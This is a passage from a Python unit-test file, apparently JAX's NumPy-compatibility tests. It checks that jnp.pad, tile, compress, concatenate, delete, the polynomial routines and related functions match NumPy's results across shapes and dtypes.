self.assertAllClose(round(np.float32(7.532), 1),
round(jnp.array(7.5, jnp.float32), 1))
self.assertAllClose(round(np.float32(1.234), 2),
round(jnp.array(1.234, jnp.float32), 2))
self.assertAllClose(round(np.float32(1.234)),
round(jnp.array(1.234, jnp.float32)),
check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_mode={}_padwidth={}_constantvalues={}".format(
jtu.format_shape_dtype_string(shape, dtype), mode, pad_width,
constant_values),
"shape": shape, "dtype": dtype, "mode": mode,
"pad_width": pad_width, "constant_values": constant_values}
for mode, shapes in [
('constant', all_shapes),
('wrap', nonempty_shapes),
('edge', nonempty_shapes),
]
for shape, dtype in _shape_and_dtypes(shapes, all_dtypes)
for constant_values in [
# None is used for modes other than 'constant'
None,
# constant
0, 1,
# (constant,)
(0,), (2.718,),
# ((before_const, after_const),)
((0, 2),), ((-1, 3.14),),
# ((before_1, after_1), ..., (before_N, after_N))
tuple((i / 2, -3.14 * i) for i in range(len(shape))),
]
for pad_width in [
# ((before_1, after_1), ..., (before_N, after_N))
tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
# ((before, after),)
((1, 2),), ((2, 0),),
# (before, after) (not in the docstring but works in numpy)
(2, 0), (0, 0),
# (pad,)
(1,), (2,),
# pad
0, 1,
]
if (pad_width != () and constant_values != () and
((mode == 'constant' and constant_values is not None) or
(mode != 'constant' and constant_values is None)))))
def testPad(self, shape, dtype, mode, pad_width, constant_values):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
if constant_values is None:
np_fun = partial(np.pad, pad_width=pad_width, mode=mode)
jnp_fun = partial(jnp.pad, pad_width=pad_width, mode=mode)
else:
np_fun = partial(np.pad, pad_width=pad_width, mode=mode,
constant_values=constant_values)
jnp_fun = partial(jnp.pad, pad_width=pad_width, mode=mode,
constant_values=constant_values)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_mode={}_pad_width={}_stat_length={}".format(
jtu.format_shape_dtype_string(shape, dtype), mode, pad_width, stat_length),
"shape": shape, "dtype": dtype, "mode": mode, "pad_width": pad_width,
"stat_length": stat_length}
for mode in ['maximum', 'minimum', 'mean', 'median']
for shape, dtype in _shape_and_dtypes(nonempty_shapes, all_dtypes)
for pad_width in [
# ((before_1, after_1), ..., (before_N, after_N))
tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
# ((before, after),)
((1, 2),), ((2, 0),),
# (before, after) (not in the docstring but works in numpy)
(2, 0), (0, 0),
# (pad,)
(1,), (2,),
# pad
0, 1,
]
for stat_length in [
None,
# ((before_1, after_1), ..., (before_N, after_N))
tuple(((i % 3 + 1), ((i + 1) % 3) + 1) for i in range(len(shape))),
# ((before, after),)
((1, 2),), ((2, 2),),
# (before, after) (not in the docstring but works in numpy)
(1, 1), (3, 4),
# (pad,)
(1,), (2,),
# pad
1, 2
]
if (pad_width != () and stat_length != () and
not (dtype in bool_dtypes and mode == 'mean'))))
def testPadStatValues(self, shape, dtype, mode, pad_width, stat_length):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
np_fun = partial(np.pad, pad_width=pad_width, mode=mode, stat_length=stat_length)
jnp_fun = partial(jnp.pad, pad_width=pad_width, mode=mode, stat_length=stat_length)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_mode={}_pad_width={}_reflect_type={}".format(
jtu.format_shape_dtype_string(shape, dtype), mode, pad_width, reflect_type),
"shape": shape, "dtype": dtype, "mode": mode, "pad_width": pad_width,
"reflect_type": reflect_type}
for mode in ['symmetric', 'reflect']
for shape, dtype in _shape_and_dtypes(nonempty_shapes, all_dtypes)
for pad_width in [
# ((before_1, after_1), ..., (before_N, after_N))
tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
# ((before, after),)
((1, 2),), ((2, 3),),
# (before, after) (not in the docstring but works in numpy)
(2, 1), (1, 2),
# (pad,)
(1,), (2,), (3,),
# pad
0, 5, 7, 10
]
for reflect_type in ['even', 'odd']
if (pad_width != () and
# following types lack precision when calculating odd values
(reflect_type != 'odd' or dtype not in [np.bool_, np.float16, jnp.bfloat16]))))
def testPadSymmetricAndReflect(self, shape, dtype, mode, pad_width, reflect_type):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
np_fun = partial(np.pad, pad_width=pad_width, mode=mode, reflect_type=reflect_type)
jnp_fun = partial(jnp.pad, pad_width=pad_width, mode=mode, reflect_type=reflect_type)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE,
tol={np.float32: 1e-3, np.complex64: 1e-3})
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_mode={}_pad_width={}_end_values={}".format(
jtu.format_shape_dtype_string(shape, dtype), "linear_ramp", pad_width, end_values),
"shape": shape, "dtype": dtype, "pad_width": pad_width,
"end_values": end_values}
for shape, dtype in _shape_and_dtypes(nonempty_shapes, all_dtypes)
for pad_width in [
# ((before_1, after_1), ..., (before_N, after_N))
tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
# ((before, after),)
((1, 2),), ((2, 0),),
# (before, after) (not in the docstring but works in numpy)
(2, 0), (0, 0),
# (pad,)
(1,), (2,),
# pad
0, 1,
]
for end_values in [
# ((before_1, after_1), ..., (before_N, after_N))
tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
# ((before, after),)
((1, 2),), ((2.0, 3.14),),
# (before, after) (not in the docstring but works in numpy)
(0, 0), (-8.0, 2.0),
# (end_values,)
(1,), (2,),
# end_values
0, 1, 100, 10.0, 3.5, 4.2, -5, -3
]
if (pad_width != () and end_values != () and
# following types lack precision
dtype not in [np.int8, np.int16, np.float16, jnp.bfloat16])))
def testPadLinearRamp(self, shape, dtype, pad_width, end_values):
if numpy_version < (1, 20) and np.issubdtype(dtype, np.integer):
raise unittest.SkipTest("NumPy 1.20 changed the semantics of np.linspace")
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
np_fun = partial(np.pad, pad_width=pad_width, mode="linear_ramp",
end_values=end_values)
jnp_fun = partial(jnp.pad, pad_width=pad_width, mode="linear_ramp",
end_values=end_values)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE)
self._CompileAndCheck(jnp_fun, args_maker)
def testPadEmpty(self):
arr = np.arange(6).reshape(2, 3)
pad_width = ((2, 3), (3, 1))
np_res = np.pad(arr, pad_width=pad_width, mode="empty")
jnp_res = jnp.pad(arr, pad_width=pad_width, mode="empty")
np.testing.assert_equal(np_res.shape, jnp_res.shape)
np.testing.assert_equal(arr, np_res[2:-3, 3:-1])
np.testing.assert_equal(arr, jnp_res[2:-3, 3:-1])
np.testing.assert_equal(np_res[2:-3, 3:-1], jnp_res[2:-3, 3:-1])
def testPadKwargs(self):
modes = {
'constant': {'constant_values': 0},
'edge': {},
'linear_ramp': {'end_values': 0},
'maximum': {'stat_length': None},
'mean': {'stat_length': None},
'median': {'stat_length': None},
'minimum': {'stat_length': None},
'reflect': {'reflect_type': 'even'},
'symmetric': {'reflect_type': 'even'},
'wrap': {},
'empty': {}
}
arr = jnp.array([1, 2, 3])
pad_width = 1
for mode in modes.keys():
allowed = modes[mode]
not_allowed = {}
for kwargs in modes.values():
if kwargs != allowed:
not_allowed.update(kwargs)
# Test if allowed keyword arguments pass
jnp.pad(arr, pad_width, mode, **allowed)
# Test if prohibited keyword arguments of other modes raise an error
match = "unsupported keyword arguments for mode '{}'".format(mode)
for key, value in not_allowed.items():
with self.assertRaisesRegex(ValueError, match):
jnp.pad(arr, pad_width, mode, **{key: value})
# Test if unsupported mode raise error.
unsupported_modes = [1, None, "foo"]
for mode in unsupported_modes:
match = "Unimplemented padding mode '{}' for np.pad.".format(mode)
with self.assertRaisesRegex(NotImplementedError, match):
jnp.pad(arr, pad_width, mode)
def testPadFunction(self):
def np_pad_with(vector, pad_width, iaxis, kwargs):
pad_value = kwargs.get('padder', 10)
vector[:pad_width[0]] = pad_value
vector[-pad_width[1]:] = pad_value
def jnp_pad_with(vector, pad_width, iaxis, kwargs):
pad_value = kwargs.get('padder', 10)
vector = jax.ops.index_update(
vector, jax.ops.index[:pad_width[0]], pad_value)
vector = jax.ops.index_update(
vector, jax.ops.index[-pad_width[1]:], pad_value)
return vector
arr = np.arange(6).reshape(2, 3)
np_res = np.pad(arr, 2, np_pad_with)
jnp_res = jnp.pad(arr, 2, jnp_pad_with)
np.testing.assert_equal(np_res, jnp_res)
arr = np.arange(24).reshape(2, 3, 4)
np_res = np.pad(arr, 1, np_pad_with, padder=100)
jnp_res = jnp.pad(arr, 1, jnp_pad_with, padder=100)
np.testing.assert_equal(np_res, jnp_res)
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(arr.shape, arr.dtype)]
jnp_fun = partial(jnp.pad, pad_width=1, mode=jnp_pad_with)
self._CompileAndCheck(jnp_fun, args_maker)
def testPadWithNumpyPadWidth(self):
a = jnp.array([1, 2, 3, 4, 5])
f = jax.jit(
partial(
jnp.pad,
pad_width=np.asarray((2, 3)),
mode="constant",
constant_values=(4, 6)))
np.testing.assert_array_equal(
f(a),
np.pad(
a,
pad_width=np.asarray((2, 3)),
mode="constant",
constant_values=(4, 6)))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape=[{}]_reps={}".format(
jtu.format_shape_dtype_string(shape, dtype), reps),
"shape": shape, "dtype": dtype, "reps": reps}
for reps in [(), (2,), (3, 4), (2, 3, 4), (1, 0, 2)]
for shape, dtype in _shape_and_dtypes(all_shapes, default_dtypes)
))
def testTile(self, shape, dtype, reps):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg: np.tile(arg, reps)
jnp_fun = lambda arg: jnp.tile(arg, reps)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in all_shapes
for dtype in all_dtypes))
def testExtract(self, shape, dtype):
rng = jtu.rand_some_zero(self.rng())
args_maker = lambda: [rng(shape, jnp.float32), rng(shape, dtype)]
self._CheckAgainstNumpy(np.extract, jnp.extract, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_ncond={}_nfunc={}".format(
jtu.format_shape_dtype_string(shape, dtype), ncond, nfunc),
"shape": shape, "dtype": dtype, "ncond": ncond, "nfunc": nfunc}
for ncond in [1, 2, 3]
for nfunc in [ncond, ncond + 1]
for shape in all_shapes
for dtype in all_dtypes))
def testPiecewise(self, shape, dtype, ncond, nfunc):
rng = jtu.rand_default(self.rng())
rng_bool = jtu.rand_int(self.rng(), 0, 2)
funclist = [lambda x: x - 1, 1, lambda x: x, 0][:nfunc]
args_maker = lambda: (rng(shape, dtype), [rng_bool(shape, bool) for i in range(ncond)])
np_fun = partial(np.piecewise, funclist=funclist)
jnp_fun = partial(jnp.piecewise, funclist=funclist)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
# This is a higher-order function, so the cache miss check will fail.
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True, check_cache_misses=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "{}_perm={}_{}".format(
jtu.format_shape_dtype_string(shape, dtype), perm, arg_type),
"dtype": dtype, "shape": shape, "perm": perm, "arg_type": arg_type}
for dtype in default_dtypes
for shape in array_shapes
for arg_type in ["splat", "value"]
for perm in [None, tuple(np.random.RandomState(0).permutation(np.zeros(shape).ndim))]))
def testTransposeTuple(self, shape, dtype, perm, arg_type):
rng = jtu.rand_some_zero(self.rng())
args_maker = lambda: [rng(shape, dtype)]
if arg_type == "value":
np_fun = lambda x: x.transpose(perm)
jnp_fun = lambda x: jnp.array(x).transpose(perm)
else:
np_fun = lambda x: x.transpose(*(perm or ()))
jnp_fun = lambda x: jnp.array(x).transpose(*(perm or ()))
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "{}_trim={}".format(
jtu.format_shape_dtype_string(a_shape, dtype), trim),
"dtype": dtype, "a_shape": a_shape, "trim": trim}
for dtype in default_dtypes
for a_shape in one_dim_array_shapes
for trim in ["f", "b", "fb"]))
def testTrimZeros(self, a_shape, dtype, trim):
rng = jtu.rand_some_zero(self.rng())
args_maker = lambda: [rng(a_shape, dtype)]
np_fun = lambda arg1: np.trim_zeros(arg1, trim)
jnp_fun = lambda arg1: jnp.trim_zeros(arg1, trim)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_rank{}".format(
jtu.format_shape_dtype_string(a_shape, dtype), rank),
"dtype": dtype, "a_shape": a_shape, "rank": rank}
for rank in (1, 2)
for dtype in default_dtypes
for a_shape in one_dim_array_shapes))
def testPoly(self, a_shape, dtype, rank):
if dtype in (np.float16, jnp.bfloat16, np.int16):
self.skipTest(f"{dtype} gets promoted to {np.float16}, which is not supported.")
elif rank == 2 and jtu.device_under_test() in ("tpu", "gpu"):
self.skipTest("Nonsymmetric eigendecomposition is only implemented on the CPU backend.")
rng = jtu.rand_default(self.rng())
tol = { np.int8: 1e-3, np.int32: 1e-3, np.float32: 1e-3, np.float64: 1e-6 }
if jtu.device_under_test() == "tpu":
tol[np.int32] = tol[np.float32] = 1e-1
tol = jtu.tolerance(dtype, tol)
args_maker = lambda: [rng(a_shape * rank, dtype)]
self._CheckAgainstNumpy(np.poly, jnp.poly, args_maker, check_dtypes=False, tol=tol)
self._CompileAndCheck(jnp.poly, args_maker, check_dtypes=True, rtol=tol, atol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "a_shape={} , b_shape={}".format(
jtu.format_shape_dtype_string(a_shape, dtype),
jtu.format_shape_dtype_string(b_shape, dtype)),
"dtype": dtype, "a_shape": a_shape, "b_shape" : b_shape}
for dtype in default_dtypes
for a_shape in one_dim_array_shapes
for b_shape in one_dim_array_shapes))
def testPolyAdd(self, a_shape, b_shape, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg1, arg2: np.polyadd(arg1, arg2)
jnp_fun = lambda arg1, arg2: jnp.polyadd(arg1, arg2)
args_maker = lambda: [rng(a_shape, dtype), rng(b_shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "a_shape={} , b_shape={}".format(
jtu.format_shape_dtype_string(a_shape, dtype),
jtu.format_shape_dtype_string(b_shape, dtype)),
"dtype": dtype, "a_shape": a_shape, "b_shape" : b_shape}
for dtype in default_dtypes
for a_shape in one_dim_array_shapes
for b_shape in one_dim_array_shapes))
def testPolySub(self, a_shape, b_shape, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg1, arg2: np.polysub(arg1, arg2)
jnp_fun = lambda arg1, arg2: jnp.polysub(arg1, arg2)
args_maker = lambda: [rng(a_shape, dtype), rng(b_shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_order={}_k={}".format(
jtu.format_shape_dtype_string(a_shape, dtype),
order, k),
"dtype": dtype, "a_shape": a_shape, "order" : order, "k": k}
for dtype in default_dtypes
for a_shape in one_dim_array_shapes
for order in range(5)
for k in [np.arange(order, dtype=dtype), np.ones(1, dtype), None]))
def testPolyInt(self, a_shape, order, k, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg1: np.polyint(arg1, m=order, k=k)
jnp_fun = lambda arg1: jnp.polyint(arg1, m=order, k=k)
args_maker = lambda: [rng(a_shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_order={}".format(
jtu.format_shape_dtype_string(a_shape, dtype),
order),
"dtype": dtype, "a_shape": a_shape, "order" : order}
for dtype in default_dtypes
for a_shape in one_dim_array_shapes
for order in range(5)))
def testPolyDer(self, a_shape, order, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg1: np.polyder(arg1, m=order)
jnp_fun = lambda arg1: jnp.polyder(arg1, m=order)
args_maker = lambda: [rng(a_shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_ptype={}".format(ptype), "ptype": ptype}
for ptype in ['int', 'np.int', 'jnp.int']))
def testIntegerPower(self, ptype):
p = {'int': 2, 'np.int': np.int32(2), 'jnp.int': jnp.int32(2)}[ptype]
jaxpr = api.make_jaxpr(partial(jnp.power, x2=p))(1)
eqns = jaxpr.jaxpr.eqns
self.assertLen(eqns, 1)
self.assertEqual(eqns[0].primitive, lax.integer_pow_p)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_x={}_y={}".format(x, y), "x": x, "y": y}
for x in [-1, 0, 1]
for y in [0, 32, 64, 128]))
def testIntegerPowerOverflow(self, x, y):
# Regression test for https://github.com/google/jax/issues/5987
args_maker = lambda: [x, y]
self._CheckAgainstNumpy(np.power, jnp.power, args_maker)
self._CompileAndCheck(jnp.power, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"shape": shape, "dtype": dtype, "axis": axis}
for shape in all_shapes
for dtype in all_dtypes
for axis in [None] + list(range(len(shape)))))
def testCompress(self, shape, dtype, axis):
rng = jtu.rand_some_zero(self.rng())
if shape in scalar_shapes or len(shape) == 0:
cond_shape = (0,)
elif axis is None:
cond_shape = (prod(shape),)
else:
cond_shape = (shape[axis],)
args_maker = lambda: [rng(cond_shape, jnp.float32), rng(shape, dtype)]
np_fun = partial(np.compress, axis=axis)
jnp_fun = partial(jnp.compress, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_condition=array[{}]_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), len(condition), axis),
"shape": shape, "dtype": dtype, "condition": condition, "axis": axis}
for shape in [(2, 3)]
for dtype in int_dtypes
# condition entries beyond axis size must be zero.
for condition in [[1], [1, 0, 0, 0, 0, 0, 0]]
for axis in [None, 0, 1]))
def testCompressMismatchedShapes(self, shape, dtype, condition, axis):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [np.array(condition), rng(shape, dtype)]
np_fun = partial(np.compress, axis=axis)
jnp_fun = partial(jnp.compress, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"shape": shape, "dtype": dtype, "axis": axis}
for shape in array_shapes
for dtype in all_dtypes
for axis in [None] + list(range(len(shape)))))
def testCompressMethod(self, shape, dtype, axis):
rng = jtu.rand_some_zero(self.rng())
if shape in scalar_shapes or len(shape) == 0:
cond_shape = (0,)
elif axis is None:
cond_shape = (prod(shape),)
else:
cond_shape = (shape[axis],)
args_maker = lambda: [rng(cond_shape, jnp.float32), rng(shape, dtype)]
np_fun = lambda condition, x: np.compress(condition, x, axis=axis)
jnp_fun = lambda condition, x: x.compress(condition, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_axis={}_baseshape=[{}]_dtypes=[{}]".format(
axis, ",".join(str(d) for d in base_shape),
",".join(np.dtype(dtype).name for dtype in arg_dtypes)),
"axis": axis, "base_shape": base_shape, "arg_dtypes": arg_dtypes}
for num_arrs in [3]
for arg_dtypes in itertools.combinations_with_replacement(default_dtypes, num_arrs)
for base_shape in [(4,), (3, 4), (2, 3, 4)]
for axis in range(-len(base_shape)+1, len(base_shape))))
def testConcatenate(self, axis, base_shape, arg_dtypes):
rng = jtu.rand_default(self.rng())
wrapped_axis = axis % len(base_shape)
shapes = [base_shape[:wrapped_axis] + (size,) + base_shape[wrapped_axis+1:]
for size, _ in zip(itertools.cycle([3, 1, 4]), arg_dtypes)]
def np_fun(*args):
args = [x if x.dtype != jnp.bfloat16 else x.astype(np.float32)
for x in args]
dtype = functools.reduce(jnp.promote_types, arg_dtypes)
return np.concatenate(args, axis=axis).astype(dtype)
jnp_fun = lambda *args: jnp.concatenate(args, axis=axis)
def args_maker():
return [rng(shape, dtype) for shape, dtype in zip(shapes, arg_dtypes)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"shape": shape, "dtype": dtype, "axis": axis}
for shape in [(4, 1), (4, 3), (4, 5, 6)]
for dtype in all_dtypes
for axis in [None] + list(range(1 - len(shape), len(shape) - 1))))
def testConcatenateArray(self, shape, dtype, axis):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
np_fun = lambda x: np.concatenate(x, axis=axis)
jnp_fun = lambda x: jnp.concatenate(x, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
def testConcatenateAxisNone(self):
# https://github.com/google/jax/issues/3419
a = jnp.array([[1, 2], [3, 4]])
b = jnp.array([[5]])
jnp.concatenate((a, b), axis=None)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_axis={}_baseshape=[{}]_dtypes=[{}]".format(
axis, ",".join(str(d) for d in base_shape),
",".join(np.dtype(dtype).name for dtype in arg_dtypes)),
"axis": axis, "base_shape": base_shape, "arg_dtypes": arg_dtypes}
for arg_dtypes in itertools.combinations_with_replacement(default_dtypes, 2)
for base_shape in [(4,), (3, 4), (2, 3, 4)]
for axis in range(-len(base_shape)+1, len(base_shape))))
def testAppend(self, axis, base_shape, arg_dtypes):
rng = jtu.rand_default(self.rng())
wrapped_axis = axis % len(base_shape)
shapes = [base_shape[:wrapped_axis] + (size,) + base_shape[wrapped_axis+1:]
for size, _ in zip(itertools.cycle([3, 1, 4]), arg_dtypes)]
def np_fun(arr, values):
arr = arr.astype(np.float32) if arr.dtype == jnp.bfloat16 else arr
values = (values.astype(np.float32) if values.dtype == jnp.bfloat16
else values)
out = np.append(arr, values, axis=axis)
return out.astype(jnp.promote_types(*arg_dtypes))
jnp_fun = lambda arr, values: jnp.append(arr, values, axis=axis)
def args_maker():
return [rng(shape, dtype) for shape, dtype in zip(shapes, arg_dtypes)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_idx={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis, idx),
"dtype": dtype, "shape": shape, "axis": axis, "idx": idx}
for shape in nonempty_nonscalar_array_shapes
for dtype in all_dtypes
for axis in [None] + list(range(-len(shape), len(shape)))
for idx in (range(-prod(shape), prod(shape))
if axis is None else
range(-shape[axis], shape[axis]))))
def testDeleteInteger(self, shape, dtype, idx, axis):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
np_fun = lambda arg: np.delete(arg, idx, axis=axis)
jnp_fun = lambda arg: jnp.delete(arg, idx, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_slc={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis, slc),
"dtype": dtype, "shape": shape, "axis": axis, "slc": slc}
for shape in nonempty_nonscalar_array_shapes
for dtype in all_dtypes
for axis in [None] + list(range(-len(shape), len(shape)))
for slc in [slice(None), slice(1, 3), slice(1, 5, 2)]))
def testDeleteSlice(self, shape, dtype, axis, slc):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
np_fun = lambda arg: np.delete(arg, slc, axis=axis)
jnp_fun = lambda arg: jnp.delete(arg, slc, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_idx={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis,
jtu.format_shape_dtype_string(idx_shape, int)),
"dtype": dtype, "shape": shape, "axis": axis, "idx_shape": idx_shape}
for shape in nonempty_nonscalar_array_shapes
for dtype in all_dtypes
for axis in [None] + list(range(-len(shape), len(shape)))
for idx_shape in all_shapes))
def testDeleteIndexArray(self, shape, dtype, axis, idx_shape):
rng = jtu.rand_default(self.rng())
max_idx = np.zeros(shape).size if axis is None else np.zeros(shape).shape[axis]
# Previous to numpy 1.19, negative indices were ignored so we don't test this.
low = 0 if numpy_version < (1, 19, 0) else -max_idx
idx = jtu.rand_int(self.rng(), low=low, high=max_idx)(idx_shape, int)
args_maker = lambda: [rng(shape, dtype)]
np_fun = lambda arg: np.delete(arg, idx, axis=axis)
jnp_fun = lambda arg: jnp.delete(arg, idx, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@unittest.skipIf(numpy_version < (1, 19), "boolean mask not supported in numpy < 1.19.0")
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"dtype": dtype, "shape": shape, "axis": axis}
for shape in nonempty_nonscalar_array_shapes
for dtype in all_dtypes
for axis in [None] + list(range(-len(shape), len(shape)))))
def testDeleteMaskArray(self, shape, dtype, axis):
rng = jtu.rand_default(self.rng())
mask_size = np.zeros(shape).size if axis is None else np.zeros(shape).shape[axis]
mask = jtu.rand_int(self.rng(), low=0, high=2)(mask_size, bool)
args_maker = lambda: [rng(shape, dtype)]
np_fun = lambda arg: np.delete(arg, mask, axis=axis)
jnp_fun = lambda arg: jnp.delete(arg, mask, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_out_dims={}".format(
jtu.format_shape_dtype_string(shape, dtype),
axis, out_dims),
"shape": shape, "dtype": dtype, "axis": axis, "out_dims": out_dims}
for shape in nonempty_array_shapes
for dtype in default_dtypes
for axis in range(-len(shape), len(shape))
for out_dims in [0, 1, 2]))
def testApplyAlongAxis(self, shape, dtype, axis, out_dims):
def func(x, out_dims):
if out_dims == 0:
return x.sum()
elif out_dims == 1:
return x * x[0]
elif out_dims == 2:
return x[:, None] + x[None, :]
else:
raise NotImplementedError(f"out_dims={out_dims}")
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
np_fun = lambda arr: np.apply_along_axis(func, axis, arr, out_dims=out_dims)
jnp_fun = lambda arr: jnp.apply_along_axis(func, axis, arr, out_dims=out_dims)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_func={}_keepdims={}_axes={}".format(
jtu.format_shape_dtype_string(shape, dtype),
func, keepdims, axes),
"shape": shape, "dtype": dtype, "func": func, "keepdims": keepdims, "axes": axes}
for shape in nonempty_shapes
for func in ["sum"]
for keepdims in [True, False]
for axes in itertools.combinations(range(len(shape)), 2)
# Avoid low-precision types in sum()
for dtype in default_dtypes if dtype not in [np.float16, jnp.bfloat16]))
def testApplyOverAxes(self, shape, dtype, func, keepdims, axes):
f = lambda x, axis: getattr(x, func)(axis=axis, keepdims=keepdims)
rng = jtu.rand_default(self.rng())
args_maker = lambda: (rng(shape, dtype),)
np_fun = lambda a: np.apply_over_axes(f, a, axes)
jnp_fun = lambda a: jnp.apply_over_axes(f, a, axes)
self._CompileAndCheck(jnp_fun, args_maker)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape=[{}]_axis={}_repeats={}_fixed_size={}".format(
jtu.format_shape_dtype_string(shape, dtype),
axis, repeats, fixed_size),
"axis": axis, "shape": shape, "dtype": dtype, "repeats": repeats,
'fixed_size': fixed_size}
for repeats in [0, 1, 2]
